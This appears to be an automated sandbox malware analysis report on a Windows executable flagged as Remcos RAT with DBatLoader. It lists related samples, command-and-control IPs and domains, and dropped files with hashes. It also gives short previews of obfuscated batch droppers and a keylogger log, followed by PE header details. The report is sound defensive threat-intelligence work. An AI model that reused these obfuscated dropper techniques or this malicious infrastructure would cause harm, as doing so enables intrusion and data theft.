                                                    103.82.231.117greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                      1DDHIzYyor.exeGet hashmaliciousDBatLoaderBrowse
                                                        creatednew.htaGet hashmaliciousCobalt Strike, DBatLoader, HTMLPhisherBrowse
                                                          178.237.33.50greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                          • geoplugin.net/json.gp
                                                          RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • geoplugin.net/json.gp
                                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • geoplugin.net/json.gp
                                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • geoplugin.net/json.gp
                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          maan2u.comK0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                          • 112.137.173.77
                                                          XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 112.137.173.77
                                                          Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                                          • 112.137.173.77
                                                          EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                          • 112.137.173.77
                                                          ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 112.137.173.77
                                                          s-part-0035.t-0009.t-msedge.netBrooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 13.107.246.63
                                                          Gosjeufon.cpl.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                          • 13.107.246.63
                                                          doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 13.107.246.63
                                                          3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                          • 13.107.246.63
                                                          s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          http://johnlewisfinance.qa.uinsure.co.ukGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          Configurator.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                          • 13.107.246.63
                                                          geoplugin.netgreatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 178.237.33.50
                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 178.237.33.50
                                                          7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          GIGABIT-MYGigabitHostingSdnBhdMYx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 103.106.249.9
                                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                          • 103.82.231.117
                                                          1DDHIzYyor.exeGet hashmaliciousDBatLoaderBrowse
                                                          • 103.82.231.117
                                                          creatednew.htaGet hashmaliciousCobalt Strike, DBatLoader, HTMLPhisherBrowse
                                                          • 103.82.231.117
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                          • 103.244.24.127
                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                          • 103.21.90.22
                                                          dontopenme.htmlGet hashmaliciousUnknownBrowse
                                                          • 185.93.164.24
                                                          x86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 103.85.108.43
                                                          FPPhfkcDCh.exeGet hashmaliciousRemcosBrowse
                                                          • 103.144.139.157
                                                          botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 103.229.240.20
                                                          ASN-QUADRANET-GLOBALUSla.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 103.68.202.250
                                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                          • 185.174.103.111
                                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 66.63.187.30
                                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 66.63.187.30
                                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 66.63.187.30
                                                          armv4l.elfGet hashmaliciousMiraiBrowse
                                                          • 204.44.218.122
                                                          rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 104.223.28.126
                                                          jew.arm.elfGet hashmaliciousUnknownBrowse
                                                          • 72.11.146.73
                                                          2.elfGet hashmaliciousUnknownBrowse
                                                          • 173.205.82.95
                                                          Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 185.228.81.1
                                                          ATOM86-ASATOM86NLgreatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 178.237.33.50
                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          • 178.237.33.50
                                                          7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          a0e9f5d64349fb13191bc781f81f42e1Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                          • 103.82.231.117
                                                          AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                          • 103.82.231.117
                                                          469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                                          • 103.82.231.117
                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                          • 103.82.231.117
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                          • 103.82.231.117
                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                          • 103.82.231.117
                                                          https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                                          • 103.82.231.117
                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                          • 103.82.231.117
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                          • 103.82.231.117
                                                          rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                                          • 103.82.231.117

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\Public\Libraries\Emxwenem.PIFgreatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse

                                                            Created / dropped Files

                                                            C:\ProgramData\remcos\logs.dat

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288
                                                            Entropy (8bit):3.309628276089514
                                                            Encrypted:false
                                                            SSDEEP:6:6lZHlH85YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lJFsec0WFe5BWFe5BW+
                                                            MD5:7FE85014D39BEA4C5929540363CECF45
                                                            SHA1:9B038CEBAA11D8FB1C06ECF02EFEFB65BB2074E7
                                                            SHA-256:489D5151E913438BB3A446DEF3309A643845257C77F7B2B9A73A93D39E818822
                                                            SHA-512:6A43DAFBCECC3B261F9BC6ED789C42F283BBA43A5A6B8964F6DF3397323EF689815472FE0219D285645076FB3461A68F49C5632ACC939D9A2A543D83EC64528A
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                            Preview:....[.2.0.2.4./.1.2./.1.9. .0.2.:.0.0.:.2.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                            C:\Users\Public\Emxwenem.url

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Emxwenem.PIF">), ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):104
                                                            Entropy (8bit):5.139114752324313
                                                            Encrypted:false
                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMV1EysbxpO1Afy:HRYFVmTWDyzNyExpLK
                                                            MD5:47C29599090276CDDA4AD978CBB59F05
                                                            SHA1:A01D97F71BBCAD1278AFA34D8C9CAC601181A054
                                                            SHA-256:5A50948B1C50FCC05C52D9AE176F70894AF2A5E6186224A93B2612B1D49ADC4E
                                                            SHA-512:F7B3E21AE048814EDEB4983A08D2A0A27B321E5B9863CF67A005F9DE232FC58CDA2631425D488957EC5D6D181D171E9775E4924F82691F620CB2C4CF9F1EC3F4
                                                            Malicious:true
                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Emxwenem.PIF"..IconIndex=947535..HotKey=42..

                                                            C:\Users\Public\EmxwenemF.cmd

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):15789
                                                            Entropy (8bit):4.658965888116939
                                                            Encrypted:false
                                                            SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                            MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                            SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                            SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                            SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                            Malicious:false
                                                            Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                            C:\Users\Public\Libraries\Emxwenem

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):847380
                                                            Entropy (8bit):7.404360654700282
                                                            Encrypted:false
                                                            SSDEEP:24576:ptIYYu1S1QfNWSb2euWo90fYXvjUtxs1nZ:DVnh/nE0fYXvqxs1nZ
                                                            MD5:8B54B08B2D95D05647C46402656B40AF
                                                            SHA1:1ED99BC0C8FA56E0FD68134B281C56CA0C60579E
                                                            SHA-256:869941F8AA6684C7BE48352941D75C9577CE2153B5EAA3F1F5F9AD8BD2EF602D
                                                            SHA-512:771ADFBCCDE1272143F8E2EE2720B2E605F399F29BF8FFF817FB4342BB13B593DD6CDD3D13F3BF55FE7B8AFF6752F9A9A46EE6F315D177478254C2A07CC74581
                                                            Malicious:true
                                                            Preview:...Y#..K...$.......!$!....#'.!.!.....!$..........%.....'.%...%'& ..."...#...'...#$..' ....'.'..$...Y#..KP.%$.....%....Y#..K...........V.@@/..`..".....">J...H....I....[..dL./W..W.%K..)..r...SJJ-....K>.4...q.>0...5....*k..&P.......,.J.z1q...c...[...z..cb..5.A..J.I..+V.......G|.V....Rz......8DJ..3......t$...VA:..w.V..'..D;=?-<.._:........]* ....!::.....q..S...Yo...V.@......%.........e...[V......>...8U...Y...3........X...<..C9..5......E.@...2..4a.Gu.q....l.....wc+..... ...aT...{...{Z=.C......*.......A...Q..dK.R.h....Y59|@@.....U.......P...4H...:.4p.D...C9.P.....< ..PE...SD....R.I.T.B9......4,,E.}...Z...#.y.s."...<.k..(....m...+..... 4...Z<..J..5.C8....,.,.o.3T"A.....R..F..#..E:=.......B//B|............u.h.x....t..U..}.....9.....................".L........+...8....,B..2SF.4.G...t*u.6.5.C..k......X.+.Z.P...V;<...V..x,?EJ.I...e...h....e..Wz.5.3I....H..\e.........u4J... .:..&....P..0..~W.o.............+....K..3....."....@...Y.w.....,..

                                                            C:\Users\Public\Libraries\Emxwenem.PIF

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1362944
                                                            Entropy (8bit):7.346681623297669
                                                            Encrypted:false
                                                            SSDEEP:24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhONqR:TtTiq973f
                                                            MD5:CCDCD04A0FFDE31366754018598EB02F
                                                            SHA1:38492826E8FEBF5BD7DA4F9D8A8379EC7044CA9A
                                                            SHA-256:63C77A3F6CFA94CBC6A4C0C1475F02520592E58D6A03E8553E77A85A3F03C32F
                                                            SHA-512:8059CF54A64B45598B39BECB3EC02FDF4B5837E4DD84AC82D33334850D61D1B33DF70DA0A65857C33E9A0FE2DC3D405BDBF6FA7214AB68E471E2E0C0F7E31053
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                            Joe Sandbox View:
                                                            • Filename: greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta, Detection: malicious, Browse
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..........................P...................@...........................p...*...@..........................H|...................................................w...............................text............................... ..`.itext..t........................... ..`.data...............................@....bss.....7...0...........................idata...*...p...,..................@....tls....4............@...................rdata...............@..............@..@.reloc..H|.......~...B..............@..B.rsrc........@......................@..@.............P......................@..@................................................................................................

                                                            C:\Users\Public\Libraries\FX.cmd

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8556
                                                            Entropy (8bit):4.623706637784657
                                                            Encrypted:false
                                                            SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                            MD5:60CD0BE570DECD49E4798554639A05AE
                                                            SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                            SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                            SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                            Malicious:true
                                                            Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                            C:\Users\Public\Libraries\NEO.cmd

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):46543
                                                            Entropy (8bit):4.705001079878445
                                                            Encrypted:false
                                                            SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                            MD5:637A66953F03B084808934ED7DF7192F
                                                            SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                            SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                            SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                            Malicious:false
                                                            Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):963
                                                            Entropy (8bit):5.018384957371898
                                                            Encrypted:false
                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                            MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                            SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                            SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                            SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                            Malicious:false
                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.346681623297669
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.38%
                                                            • InstallShield setup (43055/19) 0.43%
                                                            • Windows Screen Saver (13104/52) 0.13%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            File name:SEPTobn3BR.exe
                                                            File size:1'362'944 bytes
                                                            MD5:ccdcd04a0ffde31366754018598eb02f
                                                            SHA1:38492826e8febf5bd7da4f9d8a8379ec7044ca9a
                                                            SHA256:63c77a3f6cfa94cbc6a4c0c1475f02520592e58d6a03e8553e77a85a3f03c32f
                                                            SHA512:8059cf54a64b45598b39becb3ec02fdf4b5837e4dd84ac82d33334850d61d1b33df70da0a65857c33e9a0fe2dc3d405bdbf6fa7214ab68e471e2e0c0f7e31053
                                                            SSDEEP:24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhONqR:TtTiq973f
                                                            TLSH:AA55AF13939287A1D9255D7068DF69A65A18BF20EFB4C43A6FD17F4C8F39E0024B6D23
                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                            File Icon

                                                            Icon Hash:132bc3040b0b0b13

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x47082c
                                                            Entrypoint Section:.itext
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                            DLL Characteristics:
                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2e10263a01b85d4d1c064ae3be7c8027

                                                            Entrypoint Preview

                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            add esp, FFFFFFF0h
                                                            mov eax, 0046F39Ch
                                                            call 00007F5E34DC1839h
                                                            mov eax, dword ptr [00472C24h]
                                                            mov eax, dword ptr [eax]
                                                            call 00007F5E34E1AFC1h
                                                            mov ecx, dword ptr [004729F8h]
                                                            mov eax, dword ptr [00472C24h]
                                                            mov eax, dword ptr [eax]
                                                            mov edx, dword ptr [0046CDDCh]
                                                            call 00007F5E34E1AFC1h
                                                            mov eax, dword ptr [00472C24h]
                                                            mov eax, dword ptr [eax]
                                                            call 00007F5E34E1B035h
                                                            call 00007F5E34DBF528h
                                                            lea eax, dword ptr [eax+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x770000x2a88.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000xd0c00.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000x7c48.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x7b0000x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x777dc0x69c.idata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
